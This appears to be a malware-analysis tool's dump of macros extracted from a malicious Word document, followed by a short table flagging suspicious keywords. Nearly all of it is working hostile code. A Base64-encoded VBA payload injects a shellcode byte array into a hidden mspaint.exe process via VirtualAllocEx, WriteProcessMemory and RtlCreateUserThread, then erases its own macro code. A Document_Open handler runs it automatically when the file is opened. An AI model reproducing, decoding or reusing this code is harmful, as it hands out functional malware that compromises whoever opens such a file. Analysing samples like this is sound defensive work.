    v06754B1BKV6 = v06754B1BKV6 & "RFcnJvciBBcyBMb25nDQpFbmQgVHlwZQ0KDQpQcml2YXRlIFR5"
    v06754B1BKV6 = v06754B1BKV6 & "cGUgUFJPQ0VTU19JTkZPUk1BVElPTg0KICAgIGhQcm9jZXNzIE"
    v06754B1BKV6 = v06754B1BKV6 & "FzIExvbmdQdHINCiAgICBoVGhyZWFkIEFzIExvbmdQdHINCiAg"
    v06754B1BKV6 = v06754B1BKV6 & "ICBkd1Byb2Nlc3NJRCBBcyBMb25nDQogICAgZHdUaHJlYWRJRC"
    v06754B1BKV6 = v06754B1BKV6 & "BBcyBMb25nDQpFbmQgVHlwZQ0KDQpQdWJsaWMgaFRhcmdldFBy"
    v06754B1BKV6 = v06754B1BKV6 & "b2NIYW5kbGUgQXMgTG9uZ1B0cg0KUHVibGljIGhUaHJlYWRIYW"
    v06754B1BKV6 = v06754B1BKV6 & "5kbGUgQXMgTG9uZ1B0cg0KUHVibGljIGR3Q29kZUxlbiBBcyBM"
    v06754B1BKV6 = v06754B1BKV6 & "b25nDQpQdWJsaWMgaFRocmVhZCBBcyBMb25nDQpQdWJsaWMgVE"
    v06754B1BKV6 = v06754B1BKV6 & "lEIEFzIExvbmcNClB1YmxpYyBzaGVsbEFkZHIgQXMgTG9uZ1B0"
    v06754B1BKV6 = v06754B1BKV6 & "cg0KUHJpdmF0ZSBDb25zdCBHTUVNX01PVkVBQkxFID0gJkgyDQ"
    v06754B1BKV6 = v06754B1BKV6 & "pQcml2YXRlIENvbnN0IEdNRU1fWkVST0lOSVQgPSAmSDQwDQpQ"
    v06754B1BKV6 = v06754B1BKV6 & "cml2YXRlIENvbnN0IEdITkQgPSAoR01FTV9NT1ZFQUJMRSBPci"
    v06754B1BKV6 = v06754B1BKV6 & "BHTUVNX1pFUk9JTklUKQ0KUHJpdmF0ZSBWVHlwZSgwIFRvIDYz"
    v06754B1BKV6 = v06754B1BKV6 & "KSBBcyBJbnRlZ2VyLCBWUHRyKDAgVG8gNjMpIEFzIExvbmdQdH"
    v06754B1BKV6 = v06754B1BKV6 & "INCkNvbnN0IENDX1NURENBTEwgPSA0DQoNClN1YiBtYWluKCkN"
    v06754B1BKV6 = v06754B1BKV6 & "CiAgICBDb25zdCBTVEFSVEZfVVNFU0hPV1dJTkRPVyA9ICZIMQ"
    v06754B1BKV6 = v06754B1BKV6 & "0KICAgIENvbnN0IFNXX1NIT1cgPSA1DQogICAgQ29uc3QgU1df"
    v06754B1BKV6 = v06754B1BKV6 & "SGlkZSA9IDANCiAgICBDb25zdCBQUk9DRVNTX0FMTF9BQ0NFU1"
    v06754B1BKV6 = v06754B1BKV6 & "MgPSAmSDFGMEZGRg0KICAgIENvbnN0IE1FTV9DT01NSVQgPSAm"
    v06754B1BKV6 = v06754B1BKV6 & "SDEwMDANCiAgICBDb25zdCBNRU1fUkVTRVJWRSA9ICZIMjAwMA"
    v06754B1BKV6 = v06754B1BKV6 & "0KICAgIENvbnN0IE1FTV9SRVNFVCA9ICZIODAwMA0KICAgIENv"
    v06754B1BKV6 = v06754B1BKV6 & "bnN0IFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUgPSAmSDQwDQogIC"
    v06754B1BKV6 = v06754B1BKV6 & "ANCiAgICBEaW0gcHJvYyBBcyBQUk9DRVNTX0lORk9STUFUSU9O"
    v06754B1BKV6 = v06754B1BKV6 & "DQogICAgRGltIFBJRCBBcyBMb25nDQogICAgRGltIHNyY19zdH"
    v06754B1BKV6 = v06754B1BKV6 & "IgQXMgVmFyaWFudA0KICAgIERpbSBzdGFydCBBcyBTVEFSVFVQ"
    v06754B1BKV6 = v06754B1BKV6 & "SU5GTw0KICAgIERpbSBSZXR1cm5WYWx1ZSBBcyBMb25nUHRyDQ"
    v06754B1BKV6 = v06754B1BKV6 & "ogICAgRGltIHJldCBBcyBMb25nDQogICAgRGltIGhUaHJlYWRJ"
    v06754B1BKV6 = v06754B1BKV6 & "RCBBcyBMb25nDQogICAgRGltIHN0YXR1cyBBcyBMb25nDQogIC"
    v06754B1BKV6 = v06754B1BKV6 & "Agc3RhcnQuY2IgPSBMZW4oc3RhcnQpDQogICAgc3RhcnQuZHdG"
    v06754B1BKV6 = v06754B1BKV6 & "bGFncyA9IFNUQVJURl9VU0VTSE9XV0lORE9XDQogICAgc3Rhcn"
    v06754B1BKV6 = v06754B1BKV6 & "Qud1Nob3dXaW5kb3cgPSBTV19IaWRlDQogICAgRGltIGhHbG9i"
    v06754B1BKV6 = v06754B1BKV6 & "YWxNZW1vcnkgQXMgTG9uZ1B0ciwgaSBBcyBMb25nDQogICAgRG"
    v06754B1BKV6 = v06754B1BKV6 & "ltIGJWYWx1ZSBBcyBMb25nDQogICAgRGltIGxSZXN1bHQgQXMg"
    v06754B1BKV6 = v06754B1BKV6 & "TG9uZw0KICAgIERpbSBiSXM2NEJpdCBBcyBCb29sZWFuDQogIC"
    v06754B1BKV6 = v06754B1BKV6 & "AgRGltIGJ1ZmZlcigpIEFzIEJ5dGUNCiAgICBzcmNfc3RyID0g"
    v06754B1BKV6 = v06754B1BKV6 & "QXJyYXkoJkg1NSwmSDhCLCZIRUMsJkg4MSwmSEVDLCZIOTAsJk"
    v06754B1BKV6 = v06754B1BKV6 & "gwLCZIMCwmSDAsJkg1NiwmSDU3LCZIQjksJkg0QywmSDc3LCZI"
    v06754B1BKV6 = v06754B1BKV6 & "MjYsJkg3LCZIRTgsJkg2QiwmSDEsJkgwLCZIMCwmSEI5LCZINT"
    v06754B1BKV6 = v06754B1BKV6 & "gsJkhBNCwmSDUzLCZIRTUsJkg4QiwmSEYwLCZIRTgsJkg1Riwm"
    v06754B1BKV6 = v06754B1BKV6 & "SDEsJkgwLCZIMCwmSDZBLCZINDAsJkg2OCwmSDAsJkgxMCwmSD"
    v06754B1BKV6 = v06754B1BKV6 & "AsJkgwLCZINjgsJkgwLCZIMCwmSEEwLCZIMCwmSDZBLCZIMCwm"
    v06754B1BKV6 = v06754B1BKV6 & "SEZGLCZIRDAsJkg4QiwmSEY4LCBfCiZIQzcsJkg4NSwmSDcwLC"
    v06754B1BKV6 = v06754B1BKV6 & "ZIRkYsJkhGRiwmSEZGLCZINjgsJkg3NCwmSDc0LCZINzAsJkg4"
    v06754B1BKV6 = v06754B1BKV6 & "RCwmSDQ1LCZIRjAsJkhDNywmSDg1LCZINzQsJkhGRiwmSEZGLC"
    v06754B1BKV6 = v06754B1BKV6 & "ZIRkYsJkg3MywmSDNBLCZIMkYsJkgyRiwmSDUwLCZIQzcsJkg4"
    v06754B1BKV6 = v06754B1BKV6 & "NSwmSDc4LCZIRkYsJkhGRiwmSEZGLCZINjQsJkg2RiwmSDYzLC"
    v06754B1BKV6 = v06754B1BKV6 & "ZINzgsJkhDNywmSDg1LCZIN0MsJkhGRiwmSEZGLCZIRkYsJkgz"
    v06754B1BKV6 = v06754B1BKV6 & "MSwmSDJFLCZINjIsJkgzNCwmSEM3LCZINDUsJkg4MCwmSDYxLC"
    v06754B1BKV6 = v06754B1BKV6 & "ZIMkUsJkg2MSwgXwomSDcwLCZIQzcsJkg0NSwmSDg0LCZINzAs"
    v06754B1BKV6 = v06754B1BKV6 & "JkgyRiwmSDY0LCZINkYsJkhDNywmSDQ1LCZIODgsJkg3NywmSD"
    v06754B1BKV6 = v06754B1BKV6 & "ZFLCZINkMsJkg2RiwmSEM3LCZINDUsJkg4QywmSDYxLCZINjQs"
    v06754B1BKV6 = v06754B1BKV6 & "JkgyRSwmSDY4LCZIQzcsJkg0NSwmSDkwLCZINzQsJkg2RCwmSD"
    v06754B1BKV6 = v06754B1BKV6 & "ZDLCZIM0YsJkhDNywmSDQ1LCZIOTQsJkg2OSwmSDY0LCZIM0Qs"
    v06754B1BKV6 = v06754B1BKV6 & "JkgzOCwmSEM3LCZINDUsJkg5OCwmSDM4LCZIMjYsJkg3MywmSD"
    v06754B1BKV6 = v06754B1BKV6 & "Y1LCZIQzcsJkg0NSwmSDlDLCZINjEsJkg3MiwmSDYzLCZINjgs"
    v06754B1BKV6 = v06754B1BKV6 & "IF8KJkhDNywmSDQ1LCZIQTAsJkgzRCwmSDU0LCZINTUsJkg2OC"
    v06754B1BKV6 = v06754B1BKV6 & "wmSEM3LCZINDUsJkhBNCwmSDMzLCZINEQsJkgzMCwmSDc4LCZI"
    v06754B1BKV6 = v06754B1BKV6 & "QzcsJkg0NSwmSEE4LCZINDUsJkg1QSwmSDMzLCZINEUsJkhDNy"
    v06754B1BKV6 = v06754B1BKV6 & "wmSDQ1LCZIQUMsJkg1MCwmSDUxLCZIN0EsJkg1MiwmSEM3LCZI"
    v06754B1BKV6 = v06754B1BKV6 & "NDUsJkhCMCwmSDM0LCZINTQsJkg0NSwmSDUyLCZIQzcsJkg0NS"
    v06754B1BKV6 = v06754B1BKV6 & "wmSEI0LCZINDYsJkg2NCwmSDMyLCZINUEsJkhDNywmSDQ1LCZI"
    v06754B1BKV6 = v06754B1BKV6 & "QjgsJkg0OCwmSDUzLCZINkUsJkg1QSwmSEM3LCBfCiZINDUsJk"
    v06754B1BKV6 = v06754B1BKV6 & "hCQywmSDYxLCZINTMsJkg0NywmSDc0LCZIQzcsJkg0NSwmSEMw"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIMzEsJkg1QSwmSDQ1LCZINjQsJkhDNywmSDQ1LCZIQzQsJk"
    v06754B1BKV6 = v06754B1BKV6 & "g0NywmSDYxLCZINTcsJkg0QSwmSEM3LCZINDUsJkhDOCwmSDQ4"
    v06754B1BKV6 = v06754B1BKV6 & "LCZINTYsJkg1OCwmSDQ2LCZIQzcsJkg0NSwmSENDLCZINEMsJk"
    v06754B1BKV6 = v06754B1BKV6 & "g2MSwmSDdBLCZINkIsJkhDNywmSDQ1LCZIRDAsJkg3NywmSDU5"
    v06754B1BKV6 = v06754B1BKV6 & "LCZINTUsJkg2NCwmSEM3LCZINDUsJkhENCwmSDU3LCZINjUsJk"
    v06754B1BKV6 = v06754B1BKV6 & "g1NywmSDVBLCZIQzcsJkg0NSwgXwomSEQ4LCZINDksJkg2NSwm"
    v06754B1BKV6 = v06754B1BKV6 & "SDQ3LCZINkMsJkhDNywmSDQ1LCZIREMsJkg2OSwmSDRELCZINk"
    v06754B1BKV6 = v06754B1BKV6 & "MsJkg0OSwmSEM3LCZINDUsJkhFMCwmSDMxLCZINTQsJkg0Nywm"
    v06754B1BKV6 = v06754B1BKV6 & "SDM1LCZIQzcsJkg0NSwmSEU0LCZINTMsJkg2MSwmSDQ2LCZINk"
    v06754B1BKV6 = v06754B1BKV6 & "MsJkhDNywmSDQ1LCZIRTgsJkg3NCwmSDY1LCZINDcsJkg3Nywm"
    v06754B1BKV6 = v06754B1BKV6 & "SEM3LCZINDUsJkhFQywmSDNELCZIMCwmSDAsJkgwLCZIQzcsJk"
    v06754B1BKV6 = v06754B1BKV6 & "g0NSwmSEYwLCZINzcsJkg2OSwmSDZFLCZINjksJkhDNywmSDQ1"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIRjQsIF8KJkg2RSwmSDY1LCZINzQsJkgyRSwmSEM3LCZIND"
    v06754B1BKV6 = v06754B1BKV6 & "UsJkhGOCwmSDY0LCZINkMsJkg2QywmSDAsJkhDNywmSDQ1LCZI"
    v06754B1BKV6 = v06754B1BKV6 & "RkMsJkgwLCZIMCwmSDAsJkgwLCZIRkYsJkhENiwmSDhCLCZIRD"
    v06754B1BKV6 = v06754B1BKV6 & "csJkg4RCwmSDhELCZINzAsJkhGRiwmSEZGLCZIRkYsJkhFOCwm"
    v06754B1BKV6 = v06754B1BKV6 & "SDIyLCZIMSwmSDAsJkgwLCZIODUsJkhDMCwmSDc0LCZIMjUsJk"
    v06754B1BKV6 = v06754B1BKV6 & "g4MCwmSDNGLCZIM0MsJkg3NSwmSDFFLCZIODAsJkg3RiwmSDEs"
    v06754B1BKV6 = v06754B1BKV6 & "JkgzRiwmSDc1LCZIMTgsJkg4MCwmSDdGLCBfCiZIMiwmSDc4LC"
    v06754B1BKV6 = v06754B1BKV6 & "ZINzUsJkgxMiwmSDgwLCZIN0YsJkgzLCZINkQsJkg3NSwmSEMs"
    v06754B1BKV6 = v06754B1BKV6 & "Jkg4MCwmSDdGLCZINCwmSDZDLCZINzUsJkg2LCZIODAsJkg3Ri"
    v06754B1BKV6 = v06754B1BKV6 & "wmSDUsJkgyMCwmSDc0LCZIMiwmSEZGLCZIRDcsJkg1RiwmSDVF"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIOEIsJkhFNSwmSDVELCZIQzMsJkhDQywmSENDLCZIQ0MsJk"
    v06754B1BKV6 = v06754B1BKV6 & "g1NSwmSDhCLCZIRUMsJkg4MywmSEVDLCZIMTAsJkg2NCwmSEEx"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIMzAsJkgwLCZIMCwmSDAsJkg1MywmSDg5LCZINEQsJkhGMC"
    v06754B1BKV6 = v06754B1BKV6 & "wmSDU2LCBfCiZIOEIsJkg0MCwmSEMsJkg1NywmSDhCLCZINDgs"
    v06754B1BKV6 = v06754B1BKV6 & "JkhDLCZIOEIsJkg3OSwmSDE4LCZIODksJkg3RCwmSEZDLCZIOD"
    v06754B1BKV6 = v06754B1BKV6 & "UsJkhGRiwmSEYsJkg4NCwmSDlDLCZIMCwmSDAsJkgwLCZIOEIs"
    v06754B1BKV6 = v06754B1BKV6 & "Jkg0NywmSDNDLCZIMzMsJkhGNiwmSDhCLCZINTEsJkgyQywmSD"
    v06754B1BKV6 = v06754B1BKV6 & "hCLCZINTksJkgzMCwmSDhCLCZIOSwmSDhCLCZINDQsJkgzOCwm"
    v06754B1BKV6 = v06754B1BKV6 & "SDc4LCZIODksJkg0NSwmSEY0LCZIODksJkg0RCwmSEY4LCZIOD"
    v06754B1BKV6 = v06754B1BKV6 & "UsJkhDMCwmSDc0LCZINzMsJkhDMSwmSEVBLCBfCiZIMTAsJkgz"
    v06754B1BKV6 = v06754B1BKV6 & "MywmSEM5LCZIODUsJkhEMiwmSDc0LCZIMjAsJkg2NiwmSEYsJk"
    v06754B1BKV6 = v06754B1BKV6 & "gxRiwmSDQ0LCZIMCwmSDAsJkg4QSwmSDQsJkhCLCZIQzEsJkhD"
    v06754B1BKV6 = v06754B1BKV6 & "RSwmSEQsJkgzQywmSDYxLCZIRiwmSEJFLCZIQzAsJkg3QywmSD"
    v06754B1BKV6 = v06754B1BKV6 & "MsJkg4MywmSEM2LCZIRTAsJkg0MSwmSDMsJkhGMCwmSDNCLCZI"
    v06754B1BKV6 = v06754B1BKV6 & "Q0EsJkg3MiwmSEU5LCZIOEIsJkg0NSwmSEY0LCZIOEIsJkg1Qy"
    v06754B1BKV6 = v06754B1BKV6 & "wmSDM4LCZIMjAsJkgzLCZIQzcsJkgzLCZIREYsJkg4OSwmSDQ1"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIRjQsIF8KJkgzMywmSEZGLCZIMzksJkg3OCwmSDE4LCZINz"
    v06754B1BKV6 = v06754B1BKV6 & "YsJkgzNSwmSEYsJkgxRiwmSDQwLCZIMCwmSDhCLCZIMTMsJkg4"
    v06754B1BKV6 = v06754B1BKV6 & "RCwmSDVCLCZINCwmSDMzLCZIQzAsJkgzLCZINTUsJkhGQywmSD"
    v06754B1BKV6 = v06754B1BKV6 & "Y2LCZIRiwmSDFGLCZINDQsJkgwLCZIMCwmSEYsJkhCRSwmSEEs"
    v06754B1BKV6 = v06754B1BKV6 & "Jkg4RCwmSDUyLCZIMSwmSEMxLCZIQzgsJkhELCZIMywmSEMxLC"
    v06754B1BKV6 = v06754B1BKV6 & "ZIODAsJkg3QSwmSEZGLCZIMCwmSDc1LCZIRUYsJkgzLCZIQzYs"
    v06754B1BKV6 = v06754B1BKV6 & "JkgzQiwmSDQ1LCZIRjAsJkg3NCwgXwomSDIzLCZIOEIsJkg0NS"
    v06754B1BKV6 = v06754B1BKV6 & "wmSEY0LCZINDcsJkgzQiwmSDc4LCZIMTgsJkg3MiwmSENGLCZI"
    v06754B1BKV6 = v06754B1BKV6 & "OEIsJkg0RCwmSEY4LCZIOEIsJkg3OSwmSDE4LCZIODksJkg3RC"
    v06754B1BKV6 = v06754B1BKV6 & "wmSEZDLCZIODUsJkhGRiwmSEYsJkg4NSwmSDY0LCZIRkYsJkhG"
    v06754B1BKV6 = v06754B1BKV6 & "RiwmSEZGLCZINUYsJkg1RSwmSDMzLCZIQzAsJkg1QiwmSDhCLC"
    v06754B1BKV6 = v06754B1BKV6 & "ZIRTUsJkg1RCwmSEMzLCZIOEIsJkg1RCwmSEY0LCZIOEIsJkg1"
    v06754B1BKV6 = v06754B1BKV6 & "NSwmSEZDLCZIOEIsJkg0MywmSDI0LCZIOEQsJkg0LCZINzgsJk"
    v06754B1BKV6 = v06754B1BKV6 & "hGLCZIQjcsIF8KJkhDLCZIMTAsJkg4QiwmSDQzLCZIMUMsJkg1"
    v06754B1BKV6 = v06754B1BKV6 & "RiwmSDVFLCZINUIsJkg4RCwmSDQsJkg4OCwmSDhCLCZINCwmSD"
    v06754B1BKV6 = v06754B1BKV6 & "EwLCZIMywmSEMyLCZIOEIsJkhFNSwmSDVELCZIQzMsJkhDQywm"
    v06754B1BKV6 = v06754B1BKV6 & "SENDLCZIQ0MsJkg1NSwmSDhCLCZIRUMsJkg4MywmSEVDLCZIMj"
    v06754B1BKV6 = v06754B1BKV6 & "gsJkg1MywmSDU2LCZINTcsJkg4OSwmSDRELCZIRjAsJkgzMywm"
    v06754B1BKV6 = v06754B1BKV6 & "SEZGLCZIQjksJkgzQSwmSDU2LCZINzksJkhBNywmSDg5LCZINT"
    v06754B1BKV6 = v06754B1BKV6 & "UsJkhFNCwmSDg5LCZIN0QsJkhGQywmSEM3LCZINDUsIF8KJkhE"
    v06754B1BKV6 = v06754B1BKV6 & "OCwmSDRELCZINzksJkg0MSwmSDY3LCZIQzcsJkg0NSwmSERDLC"
    v06754B1BKV6 = v06754B1BKV6 & "ZINjUsJkg2RSwmSDc0LCZIMCwmSEU4LCZIRTQsJkhGRSwmSEZG"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIRkYsJkg4QiwmSEQ4LCZIQjksJkg3NywmSDg3LCZIN0EsJk"
    v06754B1BKV6 = v06754B1BKV6 & "hGMCwmSDg5LCZINUQsJkhFOCwmSEU4LCZIRDUsJkhGRSwmSEZG"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIRkYsJkhCOSwmSDEyLCZIOTYsJkg4OSwmSEUyLCZIODksJk"
    v06754B1BKV6 = v06754B1BKV6 & "g0NSwmSEVDLCZIRTgsJkhDOCwmSEZFLCZIRkYsJkhGRiwmSEI5"
    v06754B1BKV6 = v06754B1BKV6 & "LCZIRDMsJkg2QiwmSDZFLCZIRDQsIF8KJkg4OSwmSDQ1LCZIRT"
    v06754B1BKV6 = v06754B1BKV6 & "AsJkhFOCwmSEJCLCZIRkUsJkhGRiwmSEZGLCZINTcsJkg1Nywm"
    v06754B1BKV6 = v06754B1BKV6 & "SDU3LCZIODksJkg0NSwmSEY4LCZIOEQsJkg0NSwmSEQ4LCZINT"
    v06754B1BKV6 = v06754B1BKV6 & "csJkg1MCwmSEZGLCZIRDMsJkg4QiwmSEYwLCZIODksJkg3NSwm"
    v06754B1BKV6 = v06754B1BKV6 & "SEY0LCZIODUsJkhGNiwmSDc0LCZIMzUsJkhGLCZIMUYsJkg0NC"
    v06754B1BKV6 = v06754B1BKV6 & "wmSDAsJkgwLCZINkEsJkgwLCZINjgsJkgwLCZIMCwmSDAsJkg4"
    v06754B1BKV6 = v06754B1BKV6 & "NCwmSDZBLCZIMCwmSDZBLCZIMCwmSEZGLCZINzUsJkhGMCwmSD"
    v06754B1BKV6 = v06754B1BKV6 & "U2LCBfCiZIRkYsJkg1NSwmSEVDLCZIOEIsJkhEOCwmSDg1LCZI"
    v06754B1BKV6 = v06754B1BKV6 & "REIsJkg3NSwmSDIxLCZINTYsJkhGRiwmSDU1LCZIRjgsJkg1My"
    v06754B1BKV6 = v06754B1BKV6 & "wmSDUzLCZINTMsJkg1MywmSDhELCZINDUsJkhEOCwmSDUwLCZI"
    v06754B1BKV6 = v06754B1BKV6 & "RkYsJkg1NSwmSEU4LCZIOEIsJkhGMCwmSDg5LCZINDUsJkhGNC"
    v06754B1BKV6 = v06754B1BKV6 & "wmSDg1LCZIRjYsJkg3NSwmSEQwLCZINUYsJkg1RSwmSDMzLCZI"
    v06754B1BKV6 = v06754B1BKV6 & "QzAsJkg1QiwmSDhCLCZIRTUsJkg1RCwmSEMzLCZIOEIsJkg3NS"
    v06754B1BKV6 = v06754B1BKV6 & "wmSEU0LCZIRiwmSDFGLCZINDAsJkgwLCZIOEQsIF8KJkg0NSwm"
    v06754B1BKV6 = v06754B1BKV6 & "SEZDLCZINTAsJkg2OCwmSEQwLCZINywmSDAsJkgwLCZIOEQsJk"
    v06754B1BKV6 = v06754B1BKV6 & "g0LCZIMzcsJkg1MCwmSDUzLCZIRkYsJkg1NSwmSEUwLCZIOEIs"
    v06754B1BKV6 = v06754B1BKV6 & "Jkg0RCwmSEZDLCZIMywmSEY5LCZIODUsJkhDOSwmSDc1LCZIRT"
    v06754B1BKV6 = v06754B1BKV6 & "YsJkg1MywmSDhCLCZINUQsJkhGOCwmSEZGLCZIRDMsJkg4Qiwm"
    v06754B1BKV6 = v06754B1BKV6 & "SDc1LCZIRjQsJkg1NiwmSEZGLCZIRDMsJkg4QiwmSEM3LCZINU"
    v06754B1BKV6 = v06754B1BKV6 & "YsJkg1RSwmSDVCLCZIOEIsJkhFNSwmSDVELCZIQzMsJkhDQykN"
    v06754B1BKV6 = v06754B1BKV6 & "Cg0KICAgIFJlRGltIGJ1ZmZlcihVQm91bmQoc3JjX3N0cikgKy"
    v06754B1BKV6 = v06754B1BKV6 & "AxKSBBcyBCeXRlDQogICAgI0lmIFdpbjY0IFRoZW4NCiAgICAg"
    v06754B1BKV6 = v06754B1BKV6 & "ICAgRGltIEZTTyBBcyBPYmplY3QNCiAgICAgICAgU2V0IEZTTy"
    v06754B1BKV6 = v06754B1BKV6 & "A9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1P"
    v06754B1BKV6 = v06754B1BKV6 & "YmplY3QiKQ0KICAgICAgICBEaW0gd2luZG93c0RpciBBcyBTdH"
    v06754B1BKV6 = v06754B1BKV6 & "JpbmcNCiAgICAgICAgd2luZG93c0RpciA9IEZTTy5HZXRTcGVj"
    v06754B1BKV6 = v06754B1BKV6 & "aWFsRm9sZGVyKDApDQogICAgICAgIHdpbmRvd3NEaXIgPSB3aW"
    v06754B1BKV6 = v06754B1BKV6 & "5kb3dzRGlyICYgIi9TeXNXT1c2NC9tc3BhaW50LmV4ZSINCiAg"
    v06754B1BKV6 = v06754B1BKV6 & "ICAgICAgUmV0dXJuVmFsdWUgPSBDcmVhdGVQcm9jZXNzQSgwLC"
    v06754B1BKV6 = v06754B1BKV6 & "B3aW5kb3dzRGlyLCAwLCAwLCBGYWxzZSwgMCwgMCwgMCwgc3Rh"
    v06754B1BKV6 = v06754B1BKV6 & "cnQsIHByb2MpDQogICAgI0Vsc2UNCiAgICAgICAgUmV0dXJuVm"
    v06754B1BKV6 = v06754B1BKV6 & "FsdWUgPSBDcmVhdGVQcm9jZXNzQSgwLCAibXNwYWludC5leGUi"
    v06754B1BKV6 = v06754B1BKV6 & "LCAwLCAwLCBGYWxzZSwgMCwgMCwgMCwgc3RhcnQsIHByb2MpDQ"
    v06754B1BKV6 = v06754B1BKV6 & "ogICAgI0VuZCBJZg0KDQogICAgUElEID0gcHJvYy5kd1Byb2Nl"
    v06754B1BKV6 = v06754B1BKV6 & "c3NJRA0KICAgIElmIFBJRCBUaGVuIGhUYXJnZXRQcm9jSGFuZG"
    v06754B1BKV6 = v06754B1BKV6 & "xlID0gT3BlblByb2Nlc3MoUFJPQ0VTU19BTExfQUNDRVNTLCBG"
    v06754B1BKV6 = v06754B1BKV6 & "YWxzZSwgUElEKSBFbHNlIEV4aXQgU3ViDQogICAgZHdDb2RlTG"
    v06754B1BKV6 = v06754B1BKV6 & "VuID0gJkg4MDANCiAgICBzaGVsbEFkZHIgPSBWaXJ0dWFsQWxs"
    v06754B1BKV6 = v06754B1BKV6 & "b2NFeChoVGFyZ2V0UHJvY0hhbmRsZSwgQnlWYWwgMCwgZHdDb2"
    v06754B1BKV6 = v06754B1BKV6 & "RlTGVuLCAmSDMwMDAsIFBBR0VfRVhFQ1VURV9SRUFEV1JJVEUp"
    v06754B1BKV6 = v06754B1BKV6 & "DQogICAgRm9yIGkgPSBMQm91bmQoc3JjX3N0cikgVG8gVUJvdW"
    v06754B1BKV6 = v06754B1BKV6 & "5kKHNyY19zdHIpDQogICAgICAgYnVmZmVyKGkpID0gc3JjX3N0"
    v06754B1BKV6 = v06754B1BKV6 & "cihpKQ0KICAgIE5leHQgaQ0KDQogICAgRGltIHJlc3VsdFdyaX"
    v06754B1BKV6 = v06754B1BKV6 & "RlUHJvY2Vzcw0KICAgIHJlc3VsdFdyaXRlUHJvY2VzcyA9IFdy"
    v06754B1BKV6 = v06754B1BKV6 & "aXRlUHJvY2Vzc01lbW9yeShoVGFyZ2V0UHJvY0hhbmRsZSwgc2"
    v06754B1BKV6 = v06754B1BKV6 & "hlbGxBZGRyLCBidWZmZXIoMCksIFVCb3VuZChzcmNfc3RyKSAr"
    v06754B1BKV6 = v06754B1BKV6 & "IDEsIHJldCkNCg0KICAgIHN0YXR1cyA9IFJ0bENyZWF0ZVVzZX"
    v06754B1BKV6 = v06754B1BKV6 & "JUaHJlYWQoaFRhcmdldFByb2NIYW5kbGUsIEJ5VmFsIDAmLCAw"
    v06754B1BKV6 = v06754B1BKV6 & "LCAwLCAwLCAwLCBzaGVsbEFkZHIsIDAsIGhUaHJlYWRIYW5kbG"
    v06754B1BKV6 = v06754B1BKV6 & "UsIFRJRCkNCg0KICAgIEFwcGxpY2F0aW9uLkRpc3BsYXlBbGVy"
    v06754B1BKV6 = v06754B1BKV6 & "dHMgPSBGYWxzZQ0KICAgIFdpdGggVGhpc0RvY3VtZW50LlZCUH"
    v06754B1BKV6 = v06754B1BKV6 & "JvamVjdC5WQkNvbXBvbmVudHMNCiAgICAgICAgLlJlbW92ZSAu"
    v06754B1BKV6 = v06754B1BKV6 & "SXRlbSgiTW9kdWxlMSIpDQogICAgRW5kIFdpdGgNCiAgICANCi"
    v06754B1BKV6 = v06754B1BKV6 & "AgICBEaW0gY291bnRPZkxpbmVzIEFzIEludGVnZXINCiAgICBj"
    v06754B1BKV6 = v06754B1BKV6 & "b3VudE9mTGluZXMgPSBUaGlzRG9jdW1lbnQuVkJQcm9qZWN0Ll"
    v06754B1BKV6 = v06754B1BKV6 & "ZCQ29tcG9uZW50cy5JdGVtKCJUaGlzRG9jdW1lbnQiKS5Db2Rl"
    v06754B1BKV6 = v06754B1BKV6 & "TW9kdWxlLmNvdW50T2ZMaW5lcw0KDQogICAgVGhpc0RvY3VtZW"
    v06754B1BKV6 = v06754B1BKV6 & "50LlZCUHJvamVjdC5WQkNvbXBvbmVudHMuSXRlbSgiVGhpc0Rv"
    v06754B1BKV6 = v06754B1BKV6 & "Y3VtZW50IikuQ29kZU1vZHVsZS5EZWxldGVMaW5lcyBfDQogIC"
    v06754B1BKV6 = v06754B1BKV6 & "AgICAgIHN0YXJ0bGluZTo9MSwgQ291bnQ6PWNvdW50T2ZMaW5l"
    v06754B1BKV6 = v06754B1BKV6 & "cw0KRW5kIFN1Yg0KDQo="

    f_8T24QDYNXU0 = v06754B1BKV6
End Function

Private Sub Document_Open()
    On Error GoTo l0PPTNAC928Z
    Dim v0XUQOXAK8DF As Boolean
    Dim v18S1GZF9EZ1 As String
    Dim v2ZFM0KPI2HA As String
    Dim v3BXB7JL48CN As Object
    Dim v4N5XBNYB844 As Boolean
    Dim v5Y283P30EQQ As String
    
    v4N5XBNYB844 = f_00N4FCHZ8UL
    'f_5VEIN9K5LKK
    'f_43RX3NAVX3B
    
    If v4N5XBNYB844 Then
        Exit Sub
    End If

    v0XUQOXAK8DF = f_1R9QZYR8WCU
    If v0XUQOXAK8DF Then
        v18S1GZF9EZ1 = f_8T24QDYNXU0()
        If v18S1GZF9EZ1 = "" Then
            Exit Sub
        End If
        
        f_3TUMBL56RGP v18S1GZF9EZ1

        ThisDocument.Saved = True
'
    Else
        f_2170RZWX3YG (1)
'
        v5Y283P30EQQ = "V29yZC5BcHBsaWNhdGlvbg=="
        Set v3BXB7JL48CN = CreateObject(f_65CTFAPUR76(v5Y283P30EQQ))
        v2ZFM0KPI2HA = ThisDocument.FullName
        v3BXB7JL48CN.Visible = False
        v3BXB7JL48CN.Documents.Open v2ZFM0KPI2HA, ReadOnly:=True
    End If
l0PPTNAC928Z:
        Exit Sub
End Sub



+----------+--------------------+---------------------------------------------+
|Type      |Keyword             |Description                                  |
+----------+--------------------+---------------------------------------------+
|AutoExec  |Document_Open       |Runs when the Word or Publisher document is  |
|          |                    |opened                                       |
|Suspicious|Open                |May open a file                              |
|Suspicious|Run                 |May run an executable file or a system       |
|          |                    |command                                      |
|Suspicious|CreateObject        |May create an OLE object                     |
|Suspicious|Chr                 |May attempt to obfuscate specific strings    |
|          |                    |(use option --deobf to deobfuscate)          |
|Suspicious|VBProject           |May attempt to modify the VBA code (self-    |
|          |                    |modification)                                |
|Suspicious|VBComponents        |May attempt to modify the VBA code (self-    |
|          |                    |modification)                                |
|Suspicious|codeModule          |May attempt to modify the VBA code (self-    |
|          |                    |modification)                                |
|Suspicious|shell               |May run an executable file or a system       |
|          |                    |command (obfuscation: Base64)                |
|Suspicious|WScript.shell       |May run an executable file or a system       |
